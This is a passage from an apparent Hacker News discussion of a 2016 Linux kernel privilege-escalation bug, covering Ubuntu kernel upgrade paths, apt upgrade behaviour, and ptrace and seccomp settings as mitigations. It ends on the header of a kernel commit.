ffmpeg libva1 linux-generic linux-headers-generic linux-image-generic
0 upgraded, 0 newly installed, 0 to remove and 6 not upgraded.
The newest available version of linux-image-generic according to apt-cache showpkg is 3.13.0.100.108. (I'm running 3.13.0.98 right now.) Maybe 3.13.100 has the fix to this bug, but I'll have to figure out what's keeping back linux-kernel-image from being updated.
What's really puzzling, though, is that I should have kernel 4.4.x, since I'm running Ubuntu 14.04.5, according to the Ubuntu wiki: https://wiki.ubuntu.com/Kernel/Support#A14.04.x_Ubuntu_Kerne... It's strange that my Kubuntu installation is frozen on 3.13.x.
Note the "HWE" (hardware enablement) on that chart. Ubuntu 14.04 came with 3.13; if you want a 4.4 kernel, you have to install linux-generic-lts-xenial.
Thanks, that answers my question! Installing linux-generic-lts-xenial should let me get the 4.4.x kernel on Ubuntu 14.04.
I might still switch to Arch Linux. It's been a hassle to get the latest releases of various packages (like python, gcc, etc). I've had to use third-party PPAs or manually install them. Ubuntu's freezing of packages makes it great as a base image for Docker containers and other reliably reproducible deployment scenarios, but that's not so great as a regular desktop user.
I have been using Antergos (desktop-friendly Arch) on and off for a while. If you haven't updated for a while, it could cause problems. After I updated after staying off it for two months I had an X crash. Restarted, no problems, all updates installed.
Chris from LAS does say, I believe in User Error 6 or 7, that if you don't update Arch in a while you could have stability issues when you update.
This is indeed a point of confusion. dist-upgrade basically allows adding new packages or removing old packages; upgrade does not, and this includes the versioned kernel packages. I suspect (possibly unfoundedly) that the command got its name because this generally happened when doing distribution upgrades, but that's not what it actually does.
If you're always reviewing it manually it's OK to just use dist-upgrade; alternatively, if you want to install new packages but still not let it remove packages, you can use:
sudo apt-get upgrade --with-new-pkgs
Personally I always just use dist-upgrade and it's not a problem as long as you check it before you hit go.
Sorry, instead of "upgrade" I should have typed `full-upgrade` (which is the same thing as `dist-upgrade` and is unrelated to moving major distro versions)
I've set up cron jobs in the past which automatically ran apt-get update && apt-get upgrade, but it's sometimes caused things to unpredictably break, especially when you have the backports PPA.
After things randomly broke 3 times I decided not to add the backports PPA, and to do manual updates every now and then.
Set up `unattended-upgrades` to only install security updates; blindly apt-upgrading can lead to unintended consequences. This will let you get security upgrades without breaking 3rd-party packages.
The github page [0] states that "The In The Wild exploit relied on using ptrace."
Now, I'm wondering what purpose ptrace serves, aside from debuggers? Why don't we just disable this by default on production systems (where you shouldn't be debugging anyhow)?
> production systems (where you shouldn't be debugging anyhow)
I'm not sure about this. Ideally, yes, but if you don't know what's causing an issue it can be difficult to reproduce it, and strace can be phenomenally helpful in figuring out the cause. Of course, you could leave it off until you think you might be in such a situation.
There are a surprising number of users for ptrace. E.g. upstart uses it to count forks (presumably to mitigate fork bombs), as geofft has pointed out above.
See the SELinux boolean "deny_ptrace", and/or the sysctl "kernel.yama.ptrace_scope", and have at it.
It's not just for debugging, but for any tool that needs some measure of process control. Probably the next most common ptrace-caller I know is "strace".
So the escalation is rw access to privileged files, are LXC and Docker container breakouts prevented then? Also does /proc access through lxcfs or Docker's handling of /proc make any difference?
Theoretically, no, LXC or Docker will not help against this. Not even against this particular exploit seen in the wild; but that one could be mitigated with LXC (maybe Docker): in particular, in lxc.container.conf you can set seccomp to drop the ptrace syscall, which this in-the-wild exploit depends on.
Here, there really is a difference between a VM and a container, though.
It might protect against the current in-the-wild exploit. It sounds like it modifies a binary/library so if the container doesn't share binaries/libraries with other containers or the root namespace then you are fine. (well fine in the sense that there is no privilege escalation from the container to outside the container or across into another container.) However, there are other interesting read only pages that are shared by everyone that might be targeted (VDSO?).
commit 89eeba1594ac641a30b91942961e80fae978f839
Author: Linus Torvalds <torvalds@linux-foundation.org>
Date:   Thu Oct 13 13:07:36 2016 -0700